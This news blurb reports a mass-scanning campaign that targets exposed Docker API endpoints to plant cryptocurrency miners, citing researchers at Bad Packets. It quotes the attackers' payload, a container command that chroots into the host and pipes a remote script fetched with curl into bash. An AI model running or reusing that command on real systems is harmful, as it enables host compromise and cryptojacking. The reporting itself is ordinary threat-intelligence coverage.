A hacking group is reportedly performing a mass-scan of the internet in search of vulnerable ports on systems using enterprise sandbox software Docker to mine cryptocurrency. According to security researchers at Bad Packets, the scans, which began over the weekend, identify vulnerabilities that allow bad actors to inject malicious code that deploys a cryptocurrency miner on a company’s Docker instances, ZDNet reports. Opportunistic mass scanning activity detected targeting exposed Docker API endpoints. These scans create a container using an Alpine Linux image, and execute the payload via:"Command": "chroot /mnt /bin/sh -c "curl -sL4 https://t.co/q047bRPUyj | bash;"",#threatintel pic.twitter.com/vxszV5SF1o — Bad Packets…

This story continues at The Next Web





Full article